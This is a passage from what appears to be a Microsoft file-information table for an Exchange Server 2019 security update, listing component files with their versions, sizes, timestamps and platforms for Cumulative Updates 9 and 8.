04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.858.9| 30,088| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.858.10| 633,728| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.858.10| 1,651,064| 04-Apr-2021| 08:36| x86 \nMicrosoft.exchange.services.json.dll| 15.2.858.10| 296,344| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.858.10| 43,392| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.858.9| 233,336| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.858.10| 178,560| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.858.10| 348,560| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.858.9| 93,064| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.858.10| 296,328| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.858.10| 35,736| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.858.10| 27,032| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.858.10| 114,584| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.858.10| 53,648| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.858.9| 75,136| 04-Apr-2021| 08:30| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.858.9| 142,712| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.858.9| 24,960| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.858.9| 15,232| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.858.9| 58,768| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.858.9| 27,016| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.858.9| 46,976| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.sqm.dll| 15.2.858.9| 46,968| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.store.service.exe| 15.2.858.9| 28,032| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.858.9| 26,504| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.858.9| 13,696| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.858.9| 31,640| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.858.9| 1,205,128| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.858.9| 158,600| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.858.10| 628,104| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.858.9| 13,176| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.858.10| 16,256| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.858.9| 13,200| 04-Apr-2021| 08:30| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.858.9| 221,568| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.858.9| 13,704| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.858.10| 29,064| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.858.10| 138,648| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.858.9| 21,896| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.858.10| 40,320| 04-Apr-2021| 08:28| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.858.10| 22,912| 04-Apr-2021| 08:42| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.858.10| 21,376| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.858.10| 212,352| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.858.10| 98,696| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.858.10| 22,920| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.858.10| 169,352| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.858.9| 20,880| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.858.10| 31,624| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.858.10| 46,976| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.858.10| 30,088| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.858.9| 53,136| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.858.10| 44,936| 04-Apr-2021| 08:35| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.858.9| 18,328| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.858.10| 46,488| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.858.10| 46,472| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.858.9| 28,024| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.858.9| 457,088| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.858.9| 18,304| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.858.9| 30,592| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.dll| 15.2.858.10| 4,183,936| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.858.9| 182,168| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.858.9| 121,752| 04-Apr-2021| 08:33| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.858.9| 403,848| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.858.9| 90,000| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.858.9| 88,960| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.858.9| 68,496| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.858.9| 63,360| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.858.10| 430,488| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.858.9| 122,248| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.858.9| 17,784| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.858.9| 29,048| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.858.9| 60,800| 04-Apr-2021| 08:43| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.858.9| 50,072| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.858.9| 33,152| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.858.9| 113,032| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.858.9| 18,320| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.858.9| 52,104| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.858.9| 675,208| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.858.10| 23,936| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.858.10| 17,808| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.858.10| 487,320| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.858.10| 306,056| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.858.9| 15,744| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.858.10| 46,464| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.858.10| 1,044,376| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.858.9| 15,224| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.858.9| 18,840| 04-Apr-2021| 08:32| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.858.10| 18,832| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.858.9| 118,656| 04-Apr-2021| 08:34| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.858.10| 924,552| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.858.10| 1,469,320| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.858.9| 32,648| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.858.9| 41,864| 04-Apr-2021| 08:33| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.858.9| 24,960| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.858.9| 15,240| 04-Apr-2021| 08:28| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.858.10| 83,336| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.858.10| 50,056| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.858.9| 642,456| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.858.9| 186,248| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.858.9| 67,464| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.858.9| 12,664| 04-Apr-2021| 08:27| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.858.9| 56,712| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.858.9| 27,528| 04-Apr-2021| 08:27| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.858.9| 120,720| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.858.9| 31,624| 04-Apr-2021| 08:32| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.858.9| 57,224| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.858.9| 35,704| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.webservices.dll| 15.2.858.9| 1,054,088| 04-Apr-2021| 08:29| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.858.9| 67,976| 04-Apr-2021| 08:39| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.858.10| 23,432| 04-Apr-2021| 08:38| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.858.9| 77,176| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.858.9| 17,288| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.858.9| 29,056| 04-Apr-2021| 08:44| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.858.9| 505,240| 04-Apr-2021| 08:30| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.858.9| 14,728| 04-Apr-2021| 08:34| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.858.9| 36,744| 04-Apr-2021| 08:31| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.858.9| 66,448| 04-Apr-2021| 08:29| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.858.9| 19,352| 04-Apr-2021| 08:39| x86 \nMicrosoft.filtering.dll| 15.2.858.9| 113,016| 04-Apr-2021| 08:32| x86 \nMicrosoft.filtering.exchange.dll| 15.2.858.10| 57,224| 04-Apr-2021| 08:32| x86 \nMicrosoft.filtering.interop.dll| 15.2.858.9| 15,256| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.858.9| 46,992| 04-Apr-2021| 08:44| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.858.9| 15,768| 04-Apr-2021| 08:43| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.858.9| 23,936| 04-Apr-2021| 08:28| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.858.9| 22,408| 04-Apr-2021| 08:28| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.858.9| 34,688| 04-Apr-2021| 08:27| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,945| 04-Apr-2021| 08:31| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,325| 04-Apr-2021| 08:31| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.858.10| 1,518,472| 04-Apr-2021| 08:35| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.858.9| 13,192| 04-Apr-2021| 08:32| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.858.10| 33,168| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.858.9| 18,312| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.858.10| 46,488| 04-Apr-2021| 08:31| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.858.10| 50,568| 04-Apr-2021| 08:31| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.858.9| 72,584| 04-Apr-2021| 08:39| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.858.9| 541,576| 04-Apr-2021| 08:31| x86 \nMicrosoft.managementgui.dll| 15.2.858.9| 133,520| 04-Apr-2021| 08:39| x86 \nMicrosoft.mce.interop.dll| 15.2.858.9| 24,448| 04-Apr-2021| 08:32| x86 \nMicrosoft.office.audit.dll| 15.2.858.9| 124,800| 04-Apr-2021| 08:29| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.858.9| 593,296| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.858.9| 42,376| 04-Apr-2021| 08:32| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.858.10| 217,976| 04-Apr-2021| 08:29| x86 \nMicrosoft.office.compliance.console.dll| 15.2.858.10| 854,936| 04-Apr-2021| 08:28| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.858.10| 485,760| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.compliance.core.dll| 15.2.858.9| 413,064| 04-Apr-2021| 08:32| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.858.9| 36,232| 04-Apr-2021| 08:33| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.858.10| 84,864| 04-Apr-2021| 08:33| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.858.9| 1,782,136| 04-Apr-2021| 08:29| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.858.10| 49,536| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.858.10| 27,544| 04-Apr-2021| 08:27| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.858.9| 174,976| 04-Apr-2021| 08:28| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.858.9| 166,272| 04-Apr-2021| 08:28| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.858.9| 40,328| 04-Apr-2021| 08:28| x86 \nMicrosoft.online.box.shell.dll| 15.2.858.9| 46,472| 04-Apr-2021| 08:27| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.858.9| 67,992| 04-Apr-2021| 08:29| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.858.9| 67,992| 04-Apr-2021| 08:29| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.858.9| 120,200| 04-Apr-2021| 08:33| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,150| 04-Apr-2021| 08:38| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,088| 04-Apr-2021| 08:38| Not applicable \nMovemailbox.ps1| Not applicable| 61,196| 04-Apr-2021| 08:36| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,622| 04-Apr-2021| 08:37| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,556| 04-Apr-2021| 08:37| Not applicable \nMpgearparser.dll| 15.2.858.9| 99,720| 04-Apr-2021| 08:29| x64 \nMsclassificationadapter.dll| 15.2.858.9| 248,712| 04-Apr-2021| 08:28| x64 \nMsexchangecompliance.exe| 15.2.858.10| 78,720| 04-Apr-2021| 08:28| x86 \nMsexchangedagmgmt.exe| 15.2.858.10| 25,472| 04-Apr-2021| 08:39| x86 \nMsexchangedelivery.exe| 15.2.858.10| 38,792| 04-Apr-2021| 08:39| x86 \nMsexchangefrontendtransport.exe| 15.2.858.10| 31,616| 04-Apr-2021| 08:39| x86 \nMsexchangehmhost.exe| 15.2.858.10| 27,032| 04-Apr-2021| 08:27| x86 \nMsexchangehmrecovery.exe| 15.2.858.9| 29,584| 04-Apr-2021| 08:32| x86 \nMsexchangemailboxassistants.exe| 15.2.858.10| 72,584| 04-Apr-2021| 08:39| x86 \nMsexchangemailboxreplication.exe| 15.2.858.10| 20,872| 04-Apr-2021| 08:43| x86 \nMsexchangemigrationworkflow.exe| 15.2.858.10| 69,000| 04-Apr-2021| 08:39| x86 \nMsexchangerepl.exe| 15.2.858.10| 71,040| 04-Apr-2021| 08:38| x86 \nMsexchangesubmission.exe| 15.2.858.10| 123,288| 04-Apr-2021| 08:39| x86 \nMsexchangethrottling.exe| 15.2.858.9| 39,832| 04-Apr-2021| 08:39| x86 \nMsexchangetransport.exe| 15.2.858.9| 74,104| 04-Apr-2021| 08:39| x86 \nMsexchangetransportlogsearch.exe| 15.2.858.10| 139,152| 04-Apr-2021| 08:39| x86 \nMsexchangewatchdog.exe| 15.2.858.9| 55,688| 04-Apr-2021| 08:39| x64 \nMspatchlinterop.dll| 15.2.858.9| 53,640| 04-Apr-2021| 08:38| x64 \nNativehttpproxy.dll| 15.2.858.9| 91,528| 04-Apr-2021| 08:42| x64 \nNavigatorparser.dll| 15.2.858.9| 636,800| 04-Apr-2021| 08:29| x64 \nNego2nativeinterface.dll| 15.2.858.9| 19,336| 04-Apr-2021| 08:38| x64 \nNegotiateclientcertificatemodule.dll| 15.2.858.9| 30,080| 04-Apr-2021| 08:32| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,792| 04-Apr-2021| 08:37| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,607| 04-Apr-2021| 08:35| Not applicable \nNtspxgen.dll| 15.2.858.9| 80,776| 04-Apr-2021| 08:42| x64 \nOleconverter.exe| 15.2.858.9| 173,960| 04-Apr-2021| 08:39| x64 \nOutsideinmodule.dll| 15.2.858.9| 87,944| 04-Apr-2021| 08:29| x64 \nOwaauth.dll| 15.2.858.9| 92,040| 04-Apr-2021| 08:39| x64 \nPerf_common_extrace.dll| 15.2.858.9| 245,128| 04-Apr-2021| 08:31| x64 \nPerf_exchmem.dll| 15.2.858.9| 86,400| 04-Apr-2021| 08:29| x64 \nPipeline2.dll| 15.2.858.9| 1,454,480| 04-Apr-2021| 08:28| x64 \nPreparemoverequesthosting.ps1| Not applicable| 71,023| 04-Apr-2021| 08:38| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,257| 04-Apr-2021| 08:37| Not applicable \nProductinfo.managed.dll| 15.2.858.9| 27,024| 04-Apr-2021| 08:29| x86 \nProxybinclientsstringsdll| 15.2.858.9| 924,552| 04-Apr-2021| 08:33| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,266| 04-Apr-2021| 08:36| Not applicable \nQuietexe.exe| 15.2.858.9| 14,728| 04-Apr-2021| 08:39| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,572| 04-Apr-2021| 08:39| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,659| 04-Apr-2021| 08:38| Not applicable \nRemoteexchange.ps1| Not applicable| 23,577| 04-Apr-2021| 08:43| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,708| 04-Apr-2021| 08:36| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,026| 04-Apr-2021| 08:37| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,040| 04-Apr-2021| 08:38| Not applicable \nReplaycrimsonmsg.dll| 15.2.858.9| 1,104,768| 04-Apr-2021| 08:31| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,480| 04-Apr-2021| 08:39| Not applicable \nResetcasservice.ps1| Not applicable| 21,731| 04-Apr-2021| 08:36| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,105| 04-Apr-2021| 08:39| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,129| 04-Apr-2021| 08:39| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,198| 04-Apr-2021| 08:39| Not applicable \nRightsmanagementwrapper.dll| 15.2.858.9| 86,424| 04-Apr-2021| 08:39| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,810| 04-Apr-2021| 08:37| Not applicable \nRpcperf.dll| 15.2.858.9| 23,432| 04-Apr-2021| 08:43| x64 \nRpcproxyshim.dll| 15.2.858.9| 39,320| 04-Apr-2021| 08:37| x64 \nRulesauditmsg.dll| 15.2.858.9| 12,680| 04-Apr-2021| 08:39| x64 \nSafehtmlnativewrapper.dll| 15.2.858.9| 34,696| 04-Apr-2021| 08:39| x64 \nScanenginetest.exe| 15.2.858.9| 956,296| 04-Apr-2021| 08:27| x64 \nScanningprocess.exe| 15.2.858.9| 739,208| 04-Apr-2021| 08:32| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,840| 04-Apr-2021| 08:36| Not applicable \nServicecontrol.ps1| Not applicable| 52,317| 04-Apr-2021| 08:27| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,782| 04-Apr-2021| 08:36| Not applicable \nSettingsadapter.dll| 15.2.858.9| 116,104| 04-Apr-2021| 08:27| x64 \nSetup.exe| 15.2.858.9| 20,352| 04-Apr-2021| 08:30| x86 \nSetupui.exe| 15.2.858.10| 188,296| 04-Apr-2021| 08:43| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,217| 04-Apr-2021| 08:35| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,851| 04-Apr-2021| 08:39| Not applicable \nStatisticsutil.dll| 15.2.858.9| 142,232| 04-Apr-2021| 08:29| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,137| 04-Apr-2021| 08:38| Not applicable \nStoretsconstants.ps1| Not applicable| 15,818| 04-Apr-2021| 08:37| Not applicable \nStoretslibrary.ps1| Not applicable| 27,987| 04-Apr-2021| 08:38| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.858.9| 28,552| 04-Apr-2021| 08:40| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,955| 04-Apr-2021| 08:37| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 44,001| 04-Apr-2021| 08:38| Not applicable \nTextconversionmodule.dll| 15.2.858.9| 86,408| 04-Apr-2021| 08:27| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,731| 04-Apr-2021| 08:37| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,421| 04-Apr-2021| 08:35| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,017| 04-Apr-2021| 08:36| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,477| 04-Apr-2021| 08:39| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,058| 04-Apr-2021| 08:38| Not applicable \nUpdatecas.ps1| Not applicable| 35,786| 04-Apr-2021| 08:39| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,730| 04-Apr-2021| 08:39| Not applicable \nUpdateserver.exe| 15.2.858.9| 3,014,536| 04-Apr-2021| 08:28| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,184| 04-Apr-2021| 08:37| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 31,814| 04-Apr-2021| 08:34| Not applicable \nWsbexchange.exe| 15.2.858.9| 125,320| 04-Apr-2021| 08:44| x64 \nX400prox.dll| 15.2.858.9| 103,296| 04-Apr-2021| 08:35| x64 \n_search.lingoperators.a| 15.2.858.9| 34,688| 04-Apr-2021| 08:39| Not applicable \n_search.lingoperators.b| 15.2.858.9| 34,688| 04-Apr-2021| 08:39| Not applicable \n_search.mailboxoperators.a| 15.2.858.10| 290,200| 04-Apr-2021| 08:33| Not applicable \n_search.mailboxoperators.b| 15.2.858.10| 290,200| 04-Apr-2021| 08:33| Not applicable \n_search.operatorschema.a| 15.2.858.9| 485,760| 04-Apr-2021| 08:32| Not applicable \n_search.operatorschema.b| 15.2.858.9| 485,760| 04-Apr-2021| 08:32| Not applicable \n_search.tokenoperators.a| 15.2.858.9| 113,544| 04-Apr-2021| 08:33| Not applicable \n_search.tokenoperators.b| 15.2.858.9| 113,544| 04-Apr-2021| 08:33| Not applicable \n_search.transportoperators.a| 15.2.858.10| 67,976| 04-Apr-2021| 08:39| Not applicable \n_search.transportoperators.b| 15.2.858.10| 67,976| 04-Apr-2021| 08:39| Not applicable \n \n#### \n\n__\n\nMicrosoft Exchange Server 2019 Cumulative Update 8\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.792.13| 71,040| 04-Apr-2021| 10:03| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 04-Apr-2021| 10:03| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,965| 04-Apr-2021| 10:05| Not applicable \nAdemodule.dll| 15.2.792.13| 106,384| 04-Apr-2021| 10:04| x64 \nAirfilter.dll| 15.2.792.13| 42,888| 04-Apr-2021| 10:03| x64 \nAjaxcontroltoolkit.dll| 15.2.792.13| 92,552| 04-Apr-2021| 10:03| x86 \nAntispamcommon.ps1| Not applicable| 13,505| 04-Apr-2021| 10:05| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 04-Apr-2021| 10:03| Not applicable \nAsentirs.msi| Not applicable| 77,824| 04-Apr-2021| 10:03| Not applicable \nAsentsig.msi| Not applicable| 73,728| 04-Apr-2021| 10:03| Not applicable \nBigfunnel.bondtypes.dll| 15.2.792.13| 45,464| 04-Apr-2021| 10:04| x86 \nBigfunnel.common.dll| 15.2.792.13| 66,456| 04-Apr-2021| 10:04| x86 \nBigfunnel.configuration.dll| 15.2.792.13| 118,168| 04-Apr-2021| 10:04| x86 \nBigfunnel.entropy.dll| 15.2.792.13| 44,440| 04-Apr-2021| 10:04| x86 \nBigfunnel.filter.dll| 15.2.792.13| 54,168| 04-Apr-2021| 10:04| x86 \nBigfunnel.indexstream.dll| 15.2.792.13| 68,992| 04-Apr-2021| 10:03| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,160| 04-Apr-2021| 10:03| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.792.13| 19,848| 04-Apr-2021| 10:03| x86 \nBigfunnel.poi.dll| 15.2.792.13| 245,120| 04-Apr-2021| 